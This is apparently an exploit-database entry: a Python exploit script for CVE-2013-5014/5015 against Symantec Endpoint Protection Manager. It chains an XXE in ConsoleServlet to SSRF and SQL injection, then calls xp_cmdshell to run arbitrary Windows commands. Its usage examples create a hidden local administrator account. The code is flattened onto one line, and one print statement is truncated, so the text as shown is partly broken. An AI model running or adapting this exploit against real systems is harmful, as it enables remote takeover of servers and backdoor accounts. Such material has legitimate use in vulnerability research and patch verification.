Symantec Endpoint Protection Manager Remote Command Execution

Credit: Chris Graham
Risk: High
Local: No
Remote: Yes

import argparse import httplib """ Exploit Title: Symantec Endpoint Protection Manager Remote Command Execution Exploit Author: Chris Graham @cgrahamseven CVE: CVE-2013-5014, CVE-2013-5015 Date: February 22, 2014 Vendor Homepage: Version: 11.0, 12.0, 12.1 Tested On: Windows Server 2003, default SEPM install using embedded database References: Details: First off, this was a fantastic discovery by Stefan Viehbock. The abuse of the XXE injection to force SEPM to exploit itself through a separate SQL injection flaw was particularly amusing. I suspect the majority of SEPM users will have it configured with the default embedded database, thereby making this a pretty reliable exploit. So basically what you are looking for with the XXE injection is a vulnerability that can be triggered in the ConsoleServlet. When a multipart http request is sent, the servlet will use a custom MultipartParser class to handle the individual multipart bodies. When a body is encountered that uses a Content-Type of text/xml, the Java DocumentBuilder class is used to parse the xml. Since Symantec did not disallow declared DTD processing, it is vulnerable to the XXE injection. This appears to be a blind XXE, so a better use of the vulnerability is use it for SSRF. That leads us to the SQL injection flaw. Symantec has an http request handler called ConfigServerHandler that is programmatically restricted to only handle requests that come from localhost. I guess when they wrote this they just assumed that there was never going to be a way to send untrusted input to it since it was always going to be controlled by them. I base this guess on the fact that there is absolutely no attempt made to validate what input comes in to the updateReportingVersion function which shoves it directly into a SQL query unfiltered. In order to trigger the SQL injection you just need to send the SQL injection string in the "Parameter" url param with the "action" param set to test_av. On a default install of SEPM, it uses a SQL Anywhere embedded database. Much like MSSQL, SQL Anywhere has an xp_cmdshell stored procedure to run local OS commands. Using this stored procedure, you can compromise the server that is running SEPM. Example Usage: python -t -c "net user myadmin p@ss!23 /add" python -t -c "net localgroup Administrators myadmin /add" """ multipart_body = \ "------=_Part_156_33010715.1234\r\n" + \ "Content-Type: text/xml\r\n" + \ "Content-Disposition: form-data; name=\"Content\"\r\n\r\n" + \ "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n" + \ "<!DOCTYPE sepm [<!ENTITY payload SYSTEM " + \ "\"" + \ "&SequenceNum=140320121&Parameter=a'; call xp_cmdshell('%s');--\" >]>\r\n" + \ "<request>\r\n" + \ "<xxe>&payload;</xxe>\r\n" + \ "</request>\r\n" + \ "------=_Part_156_33010715.1234--\r\n" headers = {'Content-Type':"multipart/form-data; boundary=\"----=_Part_156_33010715.1234\""} cmdline_parser = argparse.ArgumentParser(description='Symantec Endpoint Protection Manager' + \ ' Remote Command Execution') cmdline_parser.add_argument('-t', dest='ip', help='Target IP', required=True) cmdline_parser.add_argument('-p', dest='port', help='Target Port', default=9090, \ type=int, required=False) cmdline_parser.add_argument('-ssl', dest='ssl', help='Uses SSL (set to 1 for true)', \ default=0, type=int, required=False) cmdline_parser.add_argument('-c', dest='cmd', help='Windows cmd to run (must be in quotes ie "net user")', \ required=True) args = cmdline_parser.parse_args() if args.ssl == 1: conn = httplib.HTTPSConnection(args.ip, args.port) else: conn = httplib.HTTPConnection(args.ip, args.port) multipart_body = multipart_body % (args.cmd) print "\n[*]Attempting to exploit XXE and run local windows command: " + args.cmd conn.request("POST", "/servlet/ConsoleServlet?ActionType=ConsoleLog", multipart_body, headers) res = conn.getresponse() if res.status != 200: print "[-]Exploit unsuccessful! Server returned:\n" + else: print "[+]Exploit successfully sent!"


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